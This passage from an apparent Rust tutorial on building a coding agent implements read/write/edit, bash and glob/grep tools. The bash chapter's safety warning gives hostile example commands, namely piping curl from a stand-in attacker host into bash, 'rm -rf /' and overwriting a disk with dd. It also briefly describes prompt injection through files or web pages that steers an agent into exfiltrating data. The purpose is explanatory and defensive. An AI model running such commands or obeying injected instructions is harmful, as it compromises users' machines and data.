But the core protocol is identical to what you just built. A struct holds the definition. The Tool trait provides the interface. The call method does the work. The agent loop dispatches and collects results. Understanding our three simple tools gives you the foundation to understand Claude Code's full tool suite.


6.6 Tool file organization

All three tools live in src/tools/, alongside the other tools you will build in later chapters. The module structure in the starter:

src/tools/
  mod.rs    -- re-exports all tools
  ask.rs    -- AskTool (bonus)
  bash.rs   -- BashTool (Chapter 10)
  edit.rs   -- EditTool
  read.rs   -- ReadTool
  write.rs  -- WriteTool

The mod.rs barrel re-exports everything:

#![allow(unused)]
fn main() {
mod ask;
mod bash;
mod edit;
mod read;
mod write;

pub use ask::*;
pub use bash::BashTool;
pub use edit::EditTool;
pub use read::ReadTool;
pub use write::WriteTool;
}

This lets consumers write use crate::tools::{ReadTool, WriteTool, EditTool} without reaching into individual modules.


6.7 Tests

Run the file tool tests:

cargo test -p mini-claw-code-starter test_read_   # ReadTool
cargo test -p mini-claw-code-starter test_write_  # WriteTool
cargo test -p mini-claw-code-starter test_edit_   # EditTool

Cargo test filters are substring matches, not regex, so you cannot OR them together into a single invocation. Run the three commands separately, or drop all three prefixes with a catch-all like cargo test -p mini-claw-code-starter -- --test-threads=1 if you want to see everything at once.

Here is what each test verifies:

ReadTool tests (in test_read_)

  • test_read_read_definition -- Checks that the tool definition has the name "read".
  • test_read_read_file -- Reads a file and verifies the content appears in the output.
  • test_read_read_missing_file -- Attempts to read a file that does not exist. Verifies that the result is an Err.

WriteTool tests (in ``)

  • test_write_creates_file -- Writes content to a new file, verifies the result contains a confirmation, and reads back the file to confirm the content.
  • test_write_creates_dirs -- Writes to a file inside nested directories. All intermediate directories are created automatically.
  • test_write_overwrites_existing -- Writes to a file that already has content. Verifies the old content is replaced.

EditTool tests (in ``)

  • test_edit_replaces_string -- Edits a string in a file. Verifies the result says "edited" and the file is updated.
  • test_edit_not_found -- Attempts to replace a string that does not exist. Verifies the result is an Err.
  • test_edit_not_unique -- Attempts to replace a string that appears multiple times. Verifies the error mentions the ambiguity.

Recap

Three tools, one pattern. Every tool in this chapter follows the same structure:

  1. A struct with a definition: ToolDefinition field.
  2. A new() constructor that builds the definition with the parameter builder from Chapter 4.
  3. A Tool impl with definition() and call().

The pattern scales. When you add Bash in Chapter 10, the shape is identical -- only the call() logic changes. This is the power of the Tool trait: a uniform interface that makes every tool interchangeable from the agent's perspective.

The key lessons from this chapter:

  • Automate the obvious. The WriteTool creates parent directories automatically, saving the agent a wasted tool-use round.
  • Check uniqueness. The EditTool requires the old string to appear exactly once. Zero matches means the model got the string wrong. Multiple matches means the replacement is ambiguous.
  • Errors propagate cleanly. Tools return anyhow::Result<String>. The agent loop catches errors and converts them to messages the LLM can read and recover from.

Key takeaway

File tools are the agent's hands on the codebase. The three-tool split -- read, write, edit -- gives the LLM clear verbs for distinct operations rather than one overloaded "file" tool. The EditTool's uniqueness check is the single most important design decision: it forces the LLM to provide an unambiguous match, catching mistakes early and enabling reliable self-correction.

In Chapter 10: Bash Tool, you will build the most powerful (and most dangerous) tool in the agent's arsenal -- one that can run arbitrary shell commands.

Check yourself


← Chapter 8: System Prompt · Contents · Chapter 10: Bash Tool →

Chapter 10: Bash Tool

File(s) to edit: src/tools/bash.rs Test to run: cargo test -p mini-claw-code-starter test_bash_ Estimated time: 35 min

Goal

  • Implement BashTool so the agent can run arbitrary shell commands via bash -c and capture combined stdout/stderr output.
  • Handle the three output cases correctly: stdout only, stderr only, and no output (the "(no output)" sentinel).
  • Understand why the tool has no safety rails in this chapter and what later chapters add (permissions, command classification, hooks).

The bash tool is the most powerful tool in a coding agent. It is also the most dangerous. With a single tool call, the LLM can compile code, run tests, install packages, inspect processes, query databases, or delete your entire filesystem. Every other tool -- read, write, edit, grep -- does one thing. Bash does everything.

This power is what makes a coding agent useful. An agent that can only read and write files is a fancy text editor. An agent that can run arbitrary shell commands is a programmer. It can try things, see what happens, and iterate -- the same workflow a human developer follows. Claude Code's bash tool is its most-used tool by far, accounting for the majority of all tool invocations in a typical session.

In this chapter you will build the BashTool. It takes a command string, runs it in a bash subprocess, and returns the combined output. (A timeout is shown later as an extension.) The implementation is straightforward -- the hard part is everything we deliberately leave out. There is no sandboxing, no command filtering, no permission checking. The LLM can run anything. Chapters 13-16 add the safety rails. For now, we build the engine and trust the driver.

How the BashTool processes a command

flowchart TD
    A[LLM sends ToolCall: bash] --> B[Extract command from args]
    B --> C[tokio::process::Command::new bash -c command]
    C --> D[.output captures stdout + stderr]
    D --> E{stdout empty?}
    E -->|No| F[Add stdout to result]
    E -->|Yes| G[Skip]
    F --> H{stderr empty?}
    G --> H
    H -->|No| I["Add 'stderr: ' + stderr"]
    H -->|Yes| J[Skip]
    I --> K{result empty?}
    J --> K
    K -->|Yes| L["Return '(no output)'"]
    K -->|No| M[Return combined result]

The BashTool

Open src/tools/bash.rs. Here is the starter stub:

#![allow(unused)]
fn main() {
use anyhow::Context;
use serde_json::Value;

use crate::types::*;

pub struct BashTool {
    definition: ToolDefinition,
}

impl Default for BashTool {
    fn default() -> Self {
        Self::new()
    }
}

impl BashTool {
    /// Schema: one required "command" parameter (string).
    pub fn new() -> Self {
        unimplemented!(
            "Use ToolDefinition::new(name, description).param(...) to define a required \"command\" parameter"
        )
    }
}

#[async_trait::async_trait]
impl Tool for BashTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, _args: Value) -> anyhow::Result<String> {
        unimplemented!(
            "Extract command, run bash -c, combine stdout + stderr, return \"(no output)\" if both empty"
        )
    }
}
}

You need to fill in new() and call(). Here is the complete implementation:

#![allow(unused)]
fn main() {
impl BashTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("bash", "Run a bash command and return its output")
                .param("command", "string", "The bash command to run", true),
        }
    }
}

#[async_trait::async_trait]
impl Tool for BashTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let command = args["command"]
            .as_str()
            .context("missing 'command' argument")?;

        let output = tokio::process::Command::new("bash")
            .arg("-c")
            .arg(command)
            .output()
            .await?;

        let stdout = String::from_utf8_lossy(&output.stdout);
        let stderr = String::from_utf8_lossy(&output.stderr);

        let mut result = String::new();
        if !stdout.is_empty() {
            result.push_str(&stdout);
        }
        if !stderr.is_empty() {
            if !result.is_empty() {
                result.push('\n');
            }
            result.push_str("stderr: ");
            result.push_str(&stderr);
        }

        if result.is_empty() {
            result.push_str("(no output)");
        }

        Ok(result)
    }
}
}

Let's walk through each piece.

The definition

#![allow(unused)]
fn main() {
ToolDefinition::new("bash", "Run a bash command and return its output")
    .param("command", "string", "The bash command to run", true)
}

One required parameter: command -- the shell command to execute. The description "Run a bash command and return its output" is deliberately simple. The LLM already knows what bash is. Over-describing the tool wastes prompt tokens and can confuse the model into overthinking when to use it.

As an extension, you could add a timeout parameter to let the LLM override the default timeout for long-running commands. The reference implementation includes this.

Argument extraction

#![allow(unused)]
fn main() {
let command = args["command"]
    .as_str()
    .context("missing 'command' argument")?;
}

The command extraction uses .context(...) with ? to return an Err if the argument is missing. A bash call without a command is a protocol violation, not a tool failure. The LLM should never produce this, and if it does, the agent's error handling will catch it.

Running the command

#![allow(unused)]
fn main() {
let output = tokio::process::Command::new("bash")
    .arg("-c")
    .arg(command)
    .output()
    .await?;
}

Rust concept: tokio::process::Command vs std::process::Command

tokio::process::Command is the async counterpart of std::process::Command. The key difference: std's version blocks the current OS thread while waiting for the subprocess to finish. In an async runtime like Tokio, blocking a thread means the runtime cannot make progress on other tasks (other tool calls, streaming events, UI updates). tokio's version yields to the runtime while waiting, so the thread can do useful work. Always use tokio::process inside async fn -- using std::process in an async context is a common mistake that leads to performance problems or deadlocks under load.

Two layers here, each doing one thing:

  1. tokio::process::Command spawns an async subprocess. We use bash -c so the command string is interpreted by bash, not executed as a raw binary. This means pipes, redirects, semicolons, and all other shell features work: echo hello | wc -c, ls > out.txt, cd /tmp && pwd.

  2. .output() collects the process's stdout, stderr, and exit status. This buffers everything in memory. For a production agent you would want streaming (pipe stdout/stderr to the TUI in real time), but buffered collection is simpler and sufficient for our purposes.

If the process fails to spawn (bash not found, OS refuses to create the process), the ? operator propagates the error up. The agent loop catches it and reports it to the LLM.

Adding a timeout (extension)

Without a timeout, a single bad command can hang the agent forever. The LLM might run sleep infinity, start a server that listens on a port, or trigger an interactive program that waits for stdin. Any of these blocks the agent loop indefinitely -- no more tool calls, no more responses, just a frozen process burning compute.

As an extension, you can wrap the command in tokio::time::timeout:

#![allow(unused)]
fn main() {
let output = tokio::time::timeout(
    std::time::Duration::from_secs(120),
    tokio::process::Command::new("bash")
        .arg("-c")
        .arg(command)
        .output(),
)
.await;
}

This produces a nested Result: Ok(Ok(output)) for success, Ok(Err(e)) for spawn failures, and Err(_) for timeouts. The reference implementation includes this pattern.

Output format

The output construction logic handles three concerns: stdout, stderr, and the empty case.

#![allow(unused)]
fn main() {
let stdout = String::from_utf8_lossy(&output.stdout);
let stderr = String::from_utf8_lossy(&output.stderr);

let mut result = String::new();
if !stdout.is_empty() {
    result.push_str(&stdout);
}
if !stderr.is_empty() {
    if !result.is_empty() {
        result.push('\n');
    }
    result.push_str("stderr: ");
    result.push_str(&stderr);
}

if result.is_empty() {
    result.push_str("(no output)");
}
}

Walk through each decision:

Rust concept: String::from_utf8_lossy vs String::from_utf8

String::from_utf8_lossy returns a Cow<str> -- it borrows the original bytes if they are valid UTF-8 (zero-cost), or allocates a new String with replacement characters if they are not. The alternative, String::from_utf8(), returns Err on invalid UTF-8, which would require error handling for a case we want to tolerate. from_utf8_lossy is the right choice whenever you need a string but cannot guarantee the input encoding.

String::from_utf8_lossy converts the raw bytes to a string, replacing invalid UTF-8 sequences with the replacement character. Command output is not guaranteed to be valid UTF-8 -- binary data, locale-dependent encodings, or corrupted streams can all produce invalid bytes. Lossy conversion is the right default because the LLM needs a string, and a few replacement characters are better than a crash.

Stdout comes first, undecorated. This is the primary output. When ls lists files or cat prints content, that output appears verbatim. No prefix, no wrapping.

Stderr is prefixed with "stderr: ". This lets the LLM distinguish normal output from error output. Many commands write diagnostics to stderr even on success (compiler warnings, progress indicators, deprecation notices). The prefix prevents the model from misinterpreting warnings as failures. The newline before the prefix is only added if stdout was non-empty, keeping the output clean when stderr is the only content.

"(no output)" for silent commands. Commands like true, mkdir -p /tmp/foo, or cp a b produce no stdout and no stderr on success. Returning an empty string would confuse the LLM -- it might think the tool failed or the result was lost. The sentinel string confirms the command ran and had nothing to say.

As an extension, you could also report non-zero exit codes in the output string. The reference implementation appends "exit code: N" when the process exits with a non-zero status, helping the LLM diagnose failures.

Safety considerations

The bash tool is the most dangerous tool in the agent's arsenal. It can run anything -- rm -rf /, dd if=/dev/zero of=/dev/sda, curl ... | bash. The starter's simplified Tool trait does not include safety flags like is_destructive(), but in a production agent (and in the reference implementation), the bash tool would be marked as destructive, requiring explicit user approval even in auto-approve mode.

The starter Tool trait has only definition() and call(). Adding safety metadata (read-only, destructive, concurrent-safe flags) is an extension topic covered in later chapters.

Safety warning

This tool passes LLM-generated commands directly to a bash shell. There is no sandboxing, no command filtering, no allowlist, no denylist. The LLM can run rm -rf / and your filesystem is gone. It can run curl attacker.com/payload | bash and your machine is compromised. It can read your SSH keys, your environment variables, your browser cookies.

This is not a hypothetical concern. LLMs can be manipulated through prompt injection -- malicious instructions hidden in file contents, README files, or web pages that the agent processes. A carefully crafted prompt injection could instruct the model to exfiltrate data or destroy files.

For the purposes of this tutorial, the bash tool is safe to use with trusted prompts in a controlled environment. Do not point it at untrusted input. Do not run it on a machine with sensitive data. Use a container, a VM, or at minimum a dedicated user account with limited permissions.

Chapters 13-16 build the safety infrastructure that makes the bash tool safe for production:

  • Chapter 13 (Permissions) adds the permission engine that gates every tool call, requiring user approval for destructive operations.
  • Chapter 14 (Safety) adds command classification that detects and blocks dangerous patterns like rm -rf, chmod 777, and curl | bash.
  • Chapter 15 (Hooks) adds pre-tool hooks that can inspect and reject commands before execution.
  • Chapter 16 (Plan Mode) adds a read-only mode where destructive tools are blocked entirely.

Until you build those chapters, treat the bash tool with the respect you would give sudo access to an unpredictable collaborator.

How Claude Code does it

Claude Code's bash tool shares the same core -- bash -c <command> with timeout -- but adds several layers of production hardening:

Command filtering. Before executing any command, Claude Code runs the command string through a safety classifier that checks for dangerous patterns. Commands like rm -rf /, chmod -R 777, curl ... | sh, and others are flagged or blocked outright. The classifier is not a simple regex -- it understands shell quoting and piping to avoid false positives.

Working directory management. Claude Code tracks and sets the working directory for each bash invocation. If the user cds into a directory in one command, subsequent commands remember that directory. Our version always runs in the process's current directory.

Process group killing on timeout. When our tool times out, the spawned process may continue running in the background. Claude Code creates a process group for each command and kills the entire group on timeout, ensuring no orphan processes linger.

Streaming stdout/stderr. Rather than buffering all output and returning it at the end, Claude Code pipes stdout and stderr to the TUI in real time. The user sees compilation output, test results, and progress indicators as they happen. This is essential for long-running commands where waiting for the final result would leave the user staring at a blank screen.

Permission engine integration. Every bash command passes through the permission engine before execution. Depending on the configuration, the user may be prompted to approve the command, the command may be auto-approved if it matches a safe pattern, or it may be denied outright.

Our version is the core protocol without the safety wrapping -- the minimal viable implementation that demonstrates how an LLM interacts with a shell. The production features are layers on top, not changes to the fundamental design.

Tests

Run the bash tool tests:

cargo test -p mini-claw-code-starter test_bash_

Here is what the bash-specific tests verify:

test_bash_definition -- Checks that the tool name is "bash".

test_bash_runs_command -- Runs a simple command and checks that stdout is captured.

test_bash_captures_stderr -- Runs a command that writes to stderr and checks that the output contains the stderr content.

test_bash_stdout_and_stderr -- Runs a command that produces both stdout and stderr, and verifies both appear in the output.

test_bash_no_output -- Runs true (a command that succeeds silently) and checks that the output indicates no output was produced.

test_bash_multiline_output -- Runs a multi-command pipeline and checks that all output lines appear.

Recap

You have built the bash tool -- the most important and most dangerous tool in the agent's toolkit:

  • command is the one required parameter.
  • tokio::process::Command with bash -c gives the LLM full shell access -- pipes, redirects, variables, and everything else bash supports.
  • Output format combines stdout and labeled stderr into a single string. Silent commands return "(no output)" so the LLM knows the command ran.
  • No safety rails -- this chapter builds the raw capability. The permission engine, safety classifier, hooks, and plan mode come in later chapters.

As extensions, you could add a timeout parameter (to prevent hung commands), exit code reporting, and safety flags like is_destructive().

The bash tool completes the core tool set. Your agent can now read files, write files, edit files, and run arbitrary commands. With the SimpleAgent from the earlier chapters driving the loop, you have a functioning coding agent -- one that can understand a codebase, make changes, run tests, and iterate until the job is done.

Key takeaway

The bash tool is what makes a coding agent a programmer rather than a text editor. It is also the simplest tool to implement (a single Command::new("bash").arg("-c").arg(command) call) and the hardest to make safe. The implementation pattern -- capture output, label stderr, handle silence -- is reusable for any subprocess-based tool.

What's next

In Chapter 11: Search Tools you will build the tools that help the agent navigate large codebases -- glob for finding files by pattern and grep for searching file contents. These read-only tools are the agent's eyes, complementing the hands (bash, write, edit) you have already built.

Check yourself


← Chapter 9: File Tools · Contents · Chapter 11: Search Tools →

Chapter 11: Search Tools

File(s) to edit: (extension -- no stubs in starter) Tests: No tests in the starter. GlobTool and GrepTool are extension tools. Estimated time: 25 min (read-only)

Goal

  • Understand why file discovery (GlobTool) and content search (GrepTool) are separate tools with distinct parameter schemas.
  • Implement GlobTool so the agent can find files by name pattern using the glob crate.
  • Implement GrepTool with recursive directory walking, regex matching, and an optional file type filter.
  • Learn when to use async vs sync helper functions in tool implementations (I/O-bound file reads vs fast directory walking).

A coding agent that can only read files it already knows about is like a developer who never uses find or grep. You can hand it a specific file path and it will read it faithfully, but drop it into an unfamiliar codebase and it is blind. It cannot discover which files exist, cannot search for where a function is defined, cannot find all the places a type is used. Without search, the LLM has to guess file paths -- and it will guess wrong.

Search tools fix this. In this chapter we explore two: GlobTool finds files by name pattern, and GrepTool searches file contents by regex. Together they give the LLM the ability to navigate any codebase, no matter how large or unfamiliar. These are the eyes of the agent.

How the search tools fit into the agent workflow

flowchart TD
    LLM[LLM decides what to do]
    LLM -->|"What files exist?"| Glob[GlobTool]
    LLM -->|"Where is this defined?"| Grep[GrepTool]
    Glob -->|returns file paths| LLM
    Grep -->|"returns path:line: content"| LLM
    LLM -->|reads specific file| Read[ReadTool]
    LLM -->|modifies file| Edit[EditTool]
    Read -->|file contents| LLM
    Edit -->|confirmation| LLM

Note: Search tools are extensions in this book -- neither the starter (mini-claw-code-starter) nor the reference implementation (mini-claw-code) ships a GlobTool or GrepTool. If you want to add them, you will create src/tools/glob.rs and src/tools/grep.rs from scratch and register them in src/tools/mod.rs. The complete reference code for both tools is reproduced inline below -- treat this chapter as an annotated implementation walkthrough rather than a stub-filling exercise.

Two tools, two questions

The split between glob and grep maps to two distinct questions the LLM asks when exploring code:

  1. "What files exist?" -- GlobTool. The LLM knows it wants Rust files, or test files, or config files. It does not know their exact paths. A glob pattern like **/*.rs or tests/*.toml answers this.

  2. "Where is this thing defined?" -- GrepTool. The LLM knows a function name, a type, an error message. It needs to find which file and which line contain it. A regex pattern like fn parse_sse_line or struct QueryConfig answers this.

Claude Code has both as separate tools for exactly this reason. They serve different purposes, take different inputs, and the LLM chooses between them based on what it knows. Merging them into one tool would muddy the interface -- the LLM would have to figure out whether it is doing a name search or a content search, and the parameter schema would be awkward.


GlobTool

GlobTool is the simpler of the two. It takes a glob pattern, optionally scoped to a base directory, and returns all matching file paths.

File layout

The implementation lives at src/tools/glob.rs. Here is the complete code:

#![allow(unused)]
fn main() {
use async_trait::async_trait;
use serde_json::Value;

use crate::types::*;

pub struct GlobTool {
    definition: ToolDefinition,
}

impl GlobTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("glob", "Find files matching a glob pattern")
                .param("pattern", "string", "Glob pattern (e.g. \"**/*.rs\")", true)
                .param(
                    "path",
                    "string",
                    "Base directory to search in (default: current directory)",
                    false,
                ),
        }
    }
}

impl Default for GlobTool {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl Tool for GlobTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let pattern = args["pattern"]
            .as_str()
            .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?;

        let base = args
            .get("path")
            .and_then(|v| v.as_str())
            .unwrap_or(".");

        let full_pattern = if pattern.starts_with('/') || pattern.starts_with('.') {
            pattern.to_string()
        } else {
            format!("{base}/{pattern}")
        };

        let entries: Vec<String> = glob::glob(&full_pattern)
            .map_err(|e| anyhow::anyhow!("invalid glob pattern: {e}"))?
            .filter_map(|entry| entry.ok())
            .map(|p| p.display().to_string())
            .collect();

        if entries.is_empty() {
            Ok("no files matched".to_string())
        } else {
            Ok(entries.join("\n"))
        }
    }
}
}

Walking through the implementation

The definition. Two parameters: pattern (required) and path (optional). The pattern is a standard glob -- *.rs for Rust files in the current directory, **/*.rs for Rust files recursively, src/**/*.toml for TOML files under src/. The path sets the base directory; it defaults to "." (the current working directory) when omitted.

Pattern construction. The call method builds the full glob pattern from the base directory and the user-supplied pattern. If the pattern already starts with / or ., it is treated as an absolute or relative path and used directly. Otherwise, the base directory is prepended: format!("{base}/{pattern}"). This means calling with {"pattern": "*.rs", "path": "/home/user/project"} produces the glob /home/user/project/*.rs.

The glob crate. We use the glob crate (already in Cargo.toml) to do the actual matching. glob::glob() returns an iterator of Result<PathBuf> entries. We filter_map with entry.ok() to silently skip any paths that fail (permission errors, broken symlinks). The remaining paths are converted to display strings and collected.

Output format. Matching paths are joined with newlines -- one path per line. If nothing matches, we return "no files matched" rather than an empty string. This matters for the LLM: an explicit "no files matched" message tells it the pattern was valid but found nothing, prompting it to try a different pattern. An empty string would be ambiguous.


GrepTool

GrepTool is more complex. It searches file contents using regex, optionally scoped to a directory and filtered by file type. The output follows the classic grep format: path:line_no: content.

The complete implementation

Here is src/tools/grep.rs:

#![allow(unused)]
fn main() {
use std::path::Path;

use async_trait::async_trait;
use serde_json::Value;

use crate::types::*;

pub struct GrepTool {
    definition: ToolDefinition,
}

impl GrepTool {
    pub fn new() -> Self {
        Self {
            definition: ToolDefinition::new("grep", "Search file contents using a regex pattern")
                .param("pattern", "string", "Regex pattern to search for", true)
                .param(
                    "path",
                    "string",
                    "File or directory to search in (default: current directory)",
                    false,
                )
                .param(
                    "include",
                    "string",
                    "Glob pattern to filter files (e.g. \"*.rs\")",
                    false,
                ),
        }
    }
}

impl Default for GrepTool {
    fn default() -> Self {
        Self::new()
    }
}

#[async_trait]
impl Tool for GrepTool {
    fn definition(&self) -> &ToolDefinition {
        &self.definition
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let pattern = args["pattern"]
            .as_str()
            .ok_or_else(|| anyhow::anyhow!("missing 'pattern' argument"))?;

        let re = regex::Regex::new(pattern)
            .map_err(|e| anyhow::anyhow!("invalid regex pattern: {e}"))?;

        let search_path = args
            .get("path")
            .and_then(|v| v.as_str())
            .unwrap_or(".");

        let include_pattern = args.get("include").and_then(|v| v.as_str());
        let include_glob = include_pattern
            .map(|p| glob::Pattern::new(p))
            .transpose()
            .map_err(|e| anyhow::anyhow!("invalid include pattern: {e}"))?;

        let path = Path::new(search_path);
        let mut matches = Vec::new();

        if path.is_file() {
            search_file(&re, path, &mut matches).await;
        } else if path.is_dir() {
            let mut entries = Vec::new();
            collect_files(path, &include_glob, &mut entries);
            entries.sort();
            for file_path in entries {
                search_file(&re, &file_path, &mut matches).await;
            }
        } else {
            anyhow::bail!("path does not exist: {search_path}");
        }

        if matches.is_empty() {
            Ok("no matches found".to_string())
        } else {
            Ok(matches.join("\n"))
        }
    }
}

/// Search a single file for regex matches and append formatted results.
async fn search_file(re: &regex::Regex, path: &Path, matches: &mut Vec<String>) {
    let Ok(content) = tokio::fs::read_to_string(path).await else {
        return; // Skip binary/unreadable files
    };
    let display = path.display();
    for (line_no, line) in content.lines().enumerate() {
        if re.is_match(line) {
            matches.push(format!("{display}:{}: {line}", line_no + 1));
        }
    }
}

/// Recursively collect files from a directory, optionally filtering by glob.
fn collect_files(
    dir: &Path,
    include: &Option<glob::Pattern>,
    out: &mut Vec<std::path::PathBuf>,
) {
    let Ok(entries) = std::fs::read_dir(dir) else {
        return;
    };
    for entry in entries.flatten() {
        let path = entry.path();
        if path.is_dir() {
            // Skip hidden directories
            if path
                .file_name()
                .is_some_and(|n| n.to_string_lossy().starts_with('.'))
            {
                continue;
            }
            collect_files(&path, include, out);
        } else if path.is_file() {
            if let Some(glob) = include {
                let name = path
                    .file_name()
                    .map(|n| n.to_string_lossy().to_string())
                    .unwrap_or_default();
                if !glob.matches(&name) {
                    continue;
                }
            }
            out.push(path);
        }
    }
}
}

Walking through the implementation

There is more going on here, so let's take it piece by piece.

The definition. Three parameters: pattern (required regex), path (optional file or directory), and include (optional glob filter for file names). The LLM might call it as {"pattern": "fn main"} to search the current directory, or {"pattern": "TODO", "path": "src/", "include": "*.rs"} to search only Rust files under src/.

Regex compilation. The pattern is compiled into a regex::Regex upfront. If the LLM provides an invalid regex (missing closing bracket, bad escape), we return an error immediately rather than crashing partway through the search. The regex crate handles the full Rust regex syntax -- character classes, quantifiers, alternation, captures.

The include filter. The include parameter is a glob pattern, not a regex. We compile it into a glob::Pattern using the same glob crate that powers GlobTool.

Rust concept: Option::transpose

The .transpose() call converts Option<Result<T>> into Result<Option<T>>. This is a common Rust idiom when you have an optional operation that might fail. Without transpose, you would need a match or if let to handle the Some(Ok(...)), Some(Err(...)), and None cases separately. With it, you can use ? to propagate the error and end up with a clean Option<T>. The pattern x.map(fallible_fn).transpose()? reads as: "if present, try the operation; if it fails, propagate the error; if absent, produce None."

Three-way path dispatch. The search path can be a file, a directory, or nonexistent:

  • File: Search just that one file. The LLM does this when it already knows which file to look in.
  • Directory: Recursively collect all files (filtered by include if provided), sort them for deterministic output, then search each one.
  • Nonexistent: Return an error via bail!. The agent loop catches this and reports it to the LLM as "error: path does not exist: /nonexistent/path", and the model can recover by trying a different path.

Output format. Each match is formatted as path:line_no: content, following the classic grep convention. Line numbers are 1-based (humans and LLMs both expect line 1 to be the first line, not line 0). When no matches are found, the tool returns "no matches found" -- again, explicit is better than empty.


Helper function design

Rust concept: choosing async vs sync for helpers

The two helper functions -- search_file and collect_files -- are deliberately designed with different signatures. Understanding why reveals practical Rust async patterns. The decision rule is simple: if the function does I/O that could block (reading file contents), make it async. If it does fast metadata operations (listing directory entries), keep it sync. Making everything async "just in case" adds complexity -- recursive async functions require Pin<Box<dyn Future>> or the async_recursion crate -- and provides no benefit when the operation is already fast.

search_file is async

#![allow(unused)]
fn main() {
async fn search_file(re: &regex::Regex, path: &Path, matches: &mut Vec<String>) {
    let Ok(content) = tokio::fs::read_to_string(path).await else {
        return; // Skip binary/unreadable files
    };
    let display = path.display();
    for (line_no, line) in content.lines().enumerate() {
        if re.is_match(line) {
            matches.push(format!("{display}:{}: {line}", line_no + 1));
        }
    }
}
}

This function reads a file from disk, which is I/O. Using tokio::fs::read_to_string instead of std::fs::read_to_string keeps the async runtime free to do other work while waiting on the filesystem. In a real agent with concurrent tool execution, this matters -- a slow NFS mount or large file should not block the entire runtime.

The let Ok(content) = ... else { return; } pattern is a quiet bailout. If the file cannot be read -- it is binary, it is a symlink to a deleted file, the user lacks permissions -- we silently skip it. This is the right behavior for a search tool. The LLM asked "where does this pattern appear?" and the answer should only include files where we could actually check. Reporting an error for every unreadable file in a directory tree would drown the useful results in noise.

collect_files is sync

#![allow(unused)]
fn main() {
fn collect_files(
    dir: &Path,
    include: &Option<glob::Pattern>,
    out: &mut Vec<std::path::PathBuf>,
) {
    let Ok(entries) = std::fs::read_dir(dir) else {
        return;
    };
    for entry in entries.flatten() {
        let path = entry.path();
        if path.is_dir() {
            if path
                .file_name()
                .is_some_and(|n| n.to_string_lossy().starts_with('.'))
            {
                continue;
            }
            collect_files(&path, include, out);
        } else if path.is_file() {
            if let Some(glob) = include {
                let name = path
                    .file_name()
                    .map(|n| n.to_string_lossy().to_string())
                    .unwrap_or_default();
                if !glob.matches(&name) {
                    continue;
                }
            }
            out.push(path);
        }
    }
}
}

Directory walking is fast -- it reads metadata, not file contents. Making it async would add complexity (recursive async functions require boxing) without meaningful performance benefit. The sync std::fs::read_dir is fine here.

Three details worth noting:

Hidden directory skipping. Directories whose names start with . are skipped entirely. This excludes .git, .cargo, .vscode, node_modules hidden behind a dot-prefix, and similar directories that are almost never what the LLM wants to search. Without this filter, a grep through a project directory would spend most of its time scanning .git/objects -- thousands of binary blob files that produce no useful matches.

The include filter. When present, the glob pattern is matched against the file name only (not the full path). This means "*.rs" matches src/main.rs by checking just main.rs against the pattern. This is intuitive -- when the LLM says "search only Rust files," it means files ending in .rs, regardless of where they live in the tree.

The sort. After collecting all files, the caller sorts them before searching. This ensures deterministic output order. Without sorting, read_dir returns entries in filesystem order, which varies across operating systems and even across runs on the same system. Deterministic output makes tests reliable and makes the LLM's experience consistent.


Why two separate tools

You might wonder: why not one SearchTool with a mode parameter? The answer comes down to how LLMs make decisions.

When the LLM sees two separate tools in its schema -- one called glob described as "find files matching a pattern" and one called grep described as "search file contents using regex" -- it can instantly match its intent to the right tool. "I need to find all test files" maps to glob. "I need to find where parse_sse_line is defined" maps to grep.

A combined tool with a mode: "files" | "content" parameter adds a decision layer. The LLM has to read the schema more carefully, understand the mode field, and get it right. With smaller models, this extra indirection leads to mistakes -- calling the tool in the wrong mode, or omitting the mode parameter entirely.

Claude Code keeps them separate. So do we.

There is also a practical reason: the parameter sets are different. Glob takes a glob pattern and a base path. Grep takes a regex pattern, a path, and an include filter. Merging them would mean the LLM always sees parameters that are irrelevant to what it is doing, which wastes context tokens and increases the chance of confusion.


How Claude Code does it

Our implementations are the essential protocol -- they capture the core behavior in under 200 lines. Claude Code's production versions are considerably more sophisticated.

Claude Code's Glob uses ripgrep internally for speed. On large codebases with hundreds of thousands of files, the glob crate's pure-Rust implementation can be slow. Ripgrep's directory walker is optimized for this use case, respecting .gitignore rules and parallelizing the walk. Claude Code's Glob also supports sorting results by modification time (most recently changed files first, which is often what the LLM wants) and limits the number of results to avoid flooding the context window.

Claude Code's Grep is equally enhanced. It supports context lines (-A, -B, -C flags) to show surrounding code, which helps the LLM understand matches without making a separate read call. It offers multiple output modes: show matching lines (default), show only file paths (for counting), or show match counts per file. File type filtering uses ripgrep's built-in type system rather than a glob pattern, so --type rust knows about .rs files, Cargo.toml, and build.rs without the user spelling out the glob.

Our versions skip all of this. We use the glob crate instead of ripgrep, we have no context lines, no output modes, no result limits. What we do have is the correct protocol: the LLM sends a pattern and gets back matching results in a format it can parse. Everything else is optimization. If you want to upgrade later, the Tool trait interface stays the same -- only the internals of call() change.


Tests

Since GlobTool and GrepTool are extensions, neither the starter nor the reference implementation ships tests for them. The assertions below describe the test cases you would add alongside the tool code if you build these out yourself -- they are the contract the tools should satisfy. Once you have copied the tool code into mini-claw-code-starter/src/tools/ and written these tests, you can run them with:

cargo test -p mini-claw-code-starter grep

Recommended test cases:

GlobTool tests

test_grep_glob_find_files -- Creates a temp directory with a.rs, b.rs, and c.txt. Globs for *.rs. Verifies that both .rs files appear in the result and the .txt file does not.

test_grep_glob_recursive -- Creates a temp directory with top.rs at the root and sub/deep.rs in a subdirectory. Globs for **/*.rs. Verifies that both files are found, confirming recursive descent works.

test_grep_glob_no_matches -- Creates a temp directory with file.txt and globs for *.xyz. Verifies the result contains "no files matched".

test_grep_glob_definition -- Verifies the tool definition has the name "glob".

GrepTool tests

test_grep_grep_single_file -- Creates a file containing fn main() and println!("hello"). Greps for "println". Verifies the match includes the content and the correct line number (:2:).

test_grep_grep_directory -- Creates two files, both containing fn foo(). Greps the directory for "fn foo". Verifies both files appear in the results.

